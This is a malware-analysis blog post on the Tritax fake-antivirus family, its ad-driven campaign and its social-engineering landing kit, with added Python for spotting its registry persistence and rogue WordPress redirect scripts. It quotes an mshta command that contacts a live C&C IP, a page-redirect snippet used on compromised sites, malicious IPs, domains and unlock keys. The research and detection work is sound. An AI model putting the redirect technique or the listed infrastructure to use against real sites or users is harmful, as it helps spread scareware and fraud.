February 3, 2014
Analysis of the Tritax FakeAV family, their active campaign and the FakeAV social engineering kit

This time I’m diving into an active FakeAV campaign. I’ve named it the NameChanger FakeAV; it falls under the Tritax family. As for why I named it the NameChanger, just take a look at the following image, composed of screenshots of all the different samples:

image

Update (27-2-2014): Updated the end of the article with a list of domains and IPs seen in the past 2 months. Tritax is still active and distributing.

Update (20-3-2014): After sinkholing and actively taking down the domains with the help of some friends, it seems the Tritax actors gave up. The TDSs stopped redirecting and no new domains are being registered; taking action against this campaign was successful!

Some time ago a friend, @VriesHd, pointed out a FakeAV spreading via businessinsider.com: http://urlquery.net/report.php?id=8495695 Not long after this, a similar thing happened to DailyMotion.com. A writeup for that was done by Invincea: http://www.invincea.com/2014/01/dailymotion-com-redirects-to-fake-av-threat/ Skype advertisement has also been affected by the campaign: http://community.skype.com/t5/Security-Privacy-Trust-and/Skype-ads-in-rotation-have-been-compromised-and-contain-Malware/td-p/2894251

More recently the same campaign was seen by @Malekal redirecting via PopAds delivered advertisement: https://twitter.com/malekal_morte/status/426394544414793728 and another finding: https://twitter.com/malekal_morte/status/430050149650292736

David Jacoby from Securelist also published an article after Tritax started spreading via one of the largest websites in Sweden: http://www.securelist.com/en/blog/208216070/Largest_Website_in_Sweden_Spreading_Malicious_Code

The Tritax family has been around for a long time; the first sample of it was seen around May 2009. The current campaign drops a sample I have named NameChanger.C, as it’s the third FakeAV type from this family that is constantly being repackaged with new names.
I’ll start off with an analysis of the current version of the FakeAV. After this I’ll go into the family, and third will be the new FakeAV social engineering kit this group is using with their current campaign. I’ll end with a section which is a hash dump of all the samples I’ve been scraping from their backend.

Analysis

This sample drops from a specialized social engineering kit for FakeAVs; I’ll get into details about this later. The name for this version is “Windows Accelerator Pro”, MD5: 0a0fd6b228e1edb56067c86304c15861 (VT: 20/48).

It initially installs itself in the usual startup location; the value name for these samples is “GuardSoftware”:

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
  • "GuardSoftware"="C:\Documents and Settings\admin\Application Data\guard-hqxl.exe"

The filename is formatted as “guard-%s.exe”, as can be seen when running the sample through OllyDBG in the image below. Since the 1st or 2nd of February samples are now formatted as “svc-%s.exe”.

image
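As an added example (not part of the original post), the following Python checks a Windows registry export of the Run key for the persistence pattern described above: the “GuardSoftware” value name, or an image path named guard-<random>.exe / svc-<random>.exe. The .reg text is constructed for this example and is not a capture from a real infection.

```python
import re

# Constructed sample of a "reg export" of the HKCU Run key (not a real capture).
# The second entry mirrors the persistence value seen in the sample, the third
# mirrors the "svc-%s.exe" naming used since the start of February.
SAMPLE_REG_EXPORT = r'''Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"OneDrive"="C:\\Users\\admin\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe /background"
"GuardSoftware"="C:\\Documents and Settings\\admin\\Application Data\\guard-hqxl.exe"
"Updater"="C:\\Users\\admin\\AppData\\Roaming\\svc-qpzmwk.exe"
'''

# Matches the key header line of a ...\CurrentVersion\Run key (any hive).
RUN_KEY_RE = re.compile(r'^\[(HKEY_[^\]]*\\CurrentVersion\\Run)\]$', re.IGNORECASE)
# Matches a REG_SZ value line: "name"="data"
VALUE_RE = re.compile(r'^"([^"]+)"="(.*)"$')
# Filename pattern from the sample: guard-<random>.exe, later svc-<random>.exe
TRITAX_IMAGE_RE = re.compile(r'(?:^|\\)(?:guard|svc)-[a-z]{3,12}\.exe$', re.IGNORECASE)
# Strips any command-line arguments after the executable path.
IMAGE_PATH_RE = re.compile(r'^(.*?\.exe)', re.IGNORECASE)


def find_tritax_persistence(reg_text):
    """Return (key, value_name, image_path) for Run entries matching the pattern."""
    findings = []
    current_key = None
    for raw in reg_text.splitlines():
        line = raw.strip()
        key_match = RUN_KEY_RE.match(line)
        if key_match:
            current_key = key_match.group(1)
            continue
        if line.startswith('['):  # some other key: stop looking at values
            current_key = None
            continue
        if current_key is None:
            continue
        value_match = VALUE_RE.match(line)
        if not value_match:
            continue
        name = value_match.group(1)
        data = value_match.group(2).replace('\\\\', '\\')  # undo .reg escaping
        path_match = IMAGE_PATH_RE.match(data)
        image = path_match.group(1) if path_match else data
        if name == "GuardSoftware" or TRITAX_IMAGE_RE.search(image):
            findings.append((current_key, name, image))
    return findings
```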

After the sample has installed itself it will force a reboot in order to make sure no other analysis tools are started. When it is first run (before the reboot) it will show a splash screen:

image

Once the machine has rebooted it will show the usual fake scanning with detection of infected items:

image

Once completed the user gets a listing of all the affected files:

image

When you attempt to clear up the infections by hitting “Remove All” you get a message regarding activation. You cannot clean up until you activate the product:

image

Before we activate the ‘product’ let’s have a look around at what it ‘can’ do for us:

image

All of course are unavailable to us unless we activate. When enabling one of the options we get the same “Activate” popup.

There’s also an about section in the ‘product’:
image

Besides the fake scanning and available options it will also show a variety of fake warning messages:

image

Some more aggressive warnings appear from time to time as well:

image
image

We are also, as usual with FakeAVs, not allowed to start any applications because they are ‘infected’:
image

It also warns us that we are torrenting and that downloading pirated material is a felony:

image


When we click the “Get anonymous connection” button we go back to the activation form again. When we hit the “Activate” button we are greeted by a payment form:

image

The form is retrieved by starting the Microsoft HTA client:

mshta.exe "http://93.115.82.249/?0=16&1=0&2=9&3=p&4=2600&5=1&6=1111&7=byuqshgtbm"

This is the C&C for this FakeAV, all subsequent traffic from this sample will go towards this IP.

Now if we go to the “Register” section we can ‘activate’ the product:
image

We do need a valid key for this one. The key for this sample is:

1W111-111B1-11T11-E1121


Note: If you have any old infections from before July 2012 the key is “0W000-000B0-00T00-E0020”

When we enter the correct key we are allowed to activate:
image

As soon as we hit the “Register” button we are taken back to the scan results page and it will start ‘cleaning’ up the infections:

image

Now if we look at the application it has all turned green and all ‘functionality’ is available to us:
image

The about form is also updated with the activation date and serial:

image

The application stores the activation data in the registry like this:

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Settings]
  • "UID"="lthsidoaat"
  • "net"="2014-1-9_3"
  • "Config"=hex:de,07,01,00,<truncated>

The “Config” key holds the activation key as well:

image

This FakeAV has inbuilt translations for German, French and Spanish:
image
image

I’ve seen the following IPs for the C&Cs in samples dating from November 2013 until February 2013:

  • 93.115.82.249
  • 93.115.82.248
  • 93.115.86.197

Interesting fact: these guys have been using a valid license for ASProtect for many of their payloads. This makes analyzing and reversing a bit harder, especially unpacking the samples.

The Family

The FakeAV family that was spreading here is called ‘Tritax’. It has been around for a very long time and @S!Ri has been writing about variants of this family for a long time. A big thank you to him for sharing some of the older samples of this family with me to get the timeline correct. You can follow his FakeAV findings here: http://siri-urz.blogspot.fr/


The first sample appeared around May 2009; it was called “Crusader Antivirus”:
image

This one displayed the usual fake warnings and fake scanning like we see now:
image

This FakeAV was meant to look like the AGAVA Antispy application which was a legit application. Crusader mimicked most of the GUI of Antispy:
image

This first sample is in fact where the “Tritax” name comes from, on the about dialog a company was described as “TRITAX Limited”:
image

The sample for this one has MD5: 301b4ca82a0dc6931562e9b322ceb7c1

The 2nd installment of the family was called “SecretService”, this one has had 2 versions:
image
image

After the SecretService version, “Privacy Center” and “Safety Center” popped up:
image
image

After those we were greeted by “Privacy Center” and “Control Center”:
image
image

Now we are greeted with the first NameChanger variant, I’ve named it NameChanger.A. It first appeared in December 2010. It has been seen with the following names:


The GUI has had a few changes but the general look stayed the same. A few samples:
image
image
image

After variant A, the B variant: NameChanger.B appeared in May 2011. It has had the following names:


And looked the same in every sample, only the name constantly changed:
image


And in February 2012 the first version of our NameChanger.C appeared; it was named ‘Windows Protection Manager’.
image

This shows how long this group has been active, 2009 until now. Their current campaign is still really active and spreading new versions of NameChanger.C. It seems they have now got a good setup going with the special FakeAV Kit.

The full list of used names so far for NameChanger.C:


The Social Engineering Kit

I encountered the first sample when being redirected from the Businessinsider website. While initially it seemed like a one-off I found out this is an actual package like you would normally see with exploit kits. In this case it relies on social engineering.

When landing on this kit a user is greeted with a javascript alert message:
image

Then a page which shows a fake message from Microsoft Security Essentials. The message lists a number of items that are supposedly infected:

image

When clicking the “Clean computer” message the user is prompted with a download with names like “Setup.exe” or “Install.exe”. This is when the user downloads the FakeAV and manually runs it. This way it looks believable that an Antivirus suddenly comes up talking about infections on your computer.
I have found different FakeAV family campaigns using this Kit, the only one I have seen being updated on the landing page is the one for the Tritax group. Initially the landing page looked like this:



Around the 10th of January it suddenly changed the JavaScript on the landing page to a crypted version.



A week later on the 17th of January the landing changed again, only this time the crypted JavaScript snippets were put in external files called “scr1.js” and “scr2.js”. Landing page code:

During this time the DNS for the landing of the Tritax group is always on a subdomain, this is either ‘b2811a66’, ‘c3913c6c’, ‘e324rfds’, ‘wed322d2’, ‘5c4e4143’ or ‘90d6bc5a’. Of course this will change from time to time; it just means the main domain never points to the landing server, it’s always a subdomain. Additionally the domains used by this group are registered at registrars allowing for domain tasting (5-day testing period, free!). The domains rotate every few days. The first registrar I saw them appear at was Domeny.pl; they are currently being tasted at Key-Systems GmbH. These are the stats in terms of TLDs I have seen:

  • 106 pw
  • 76 nl
  • 30 pl
  • 15 com


Here is a full list of all the domains used in the period of 1st of January 2014 until the 25th of January 2014.



These domains used custom nameservers; @vriesHD has done his best taking these down for the past months. The IPs I’ve seen used in this campaign’s landing pages are:

  • 93.115.82.246
  • 93.115.82.247
  • 93.115.86.199
  • 212.83.137.239
  • 212.83.138.29
  • 212.83.138.30
  • 212.83.155.45

The following domains have been seen for the custom nameservers:

  • dsfe1.com
  • dsfe2.com
  • svav1.com
  • svav2.com
  • stav1.com
  • stav2.com
  • isavx.com
  • isavh.com
  • ispav.com
  • ispax.com

In addition to spreading via advertisements and spam mail, these guys have also compromised a large number of websites. All compromised websites are WordPress websites. A malicious PHP file was uploaded after exploitation. This file redirects to the domains listed above (and the new ones still being generated). These pages respond with:

window.top.location.replace("***tritax campaign landing page***");

They can usually be spotted when websites have javascript snippets loaded like:

<script src="/wp-includes/js/jquery/jquery.php"></script>
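As an added example (not code from the original post), this Python flags the compromise indicator described above: a <script> tag that loads a .php file from under /wp-includes/ (a legitimate include there would be a static .js file), and a window.top.location.replace() redirect inside the served script body. The HTML page, the script body and the landing hostname are constructed for this example.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit


class ScriptSrcCollector(HTMLParser):
    """Collect the src attribute of every <script> tag in a page."""
    def __init__(self):
        super().__init__()
        self.srcs = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "script":
            for name, value in attrs:
                if name.lower() == "src" and value:
                    self.srcs.append(value)


def suspicious_wp_includes(html):
    """Return script srcs that load a .php file from inside wp-includes/."""
    parser = ScriptSrcCollector()
    parser.feed(html)
    return [s for s in parser.srcs
            if "/wp-includes/" in urlsplit(s).path.lower()
            and urlsplit(s).path.lower().endswith(".php")]


# Matches window.top.location.replace("..."), tolerating spaces around the URL.
REDIRECT_RE = re.compile(
    r'window\.top\.location\.replace\(\s*["\']\s*([^"\']+?)\s*["\']\s*\)', re.IGNORECASE)


def extract_top_redirect(js):
    """Return the redirect target carried by a script body, or None."""
    m = REDIRECT_RE.search(js)
    return m.group(1) if m else None


def assess(html, included_script_bodies):
    """Report rogue includes and the landing hostname each one redirects to."""
    report = {"rogue_includes": suspicious_wp_includes(html), "redirects": {}}
    for src in report["rogue_includes"]:
        target = extract_top_redirect(included_script_bodies.get(src, ""))
        if target:
            report["redirects"][src] = urlsplit(target).hostname
    return report


# Constructed sample page and script body; the landing domain is a placeholder.
SAMPLE_HTML = '''<html><head>
<script src="/wp-includes/js/jquery/jquery.js?ver=1.10.2"></script>
<script src="/wp-includes/js/jquery/jquery.php"></script>
</head><body>site content</body></html>'''
SAMPLE_JQUERY_PHP_BODY = 'window.top.location.replace(" http://b2811a66.landing-placeholder.pw/ ");'
```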


The full list of websites affected (some of them have already cleaned up or have gone offline):


Collected DNS information from January -> February 2014

Collected Samples
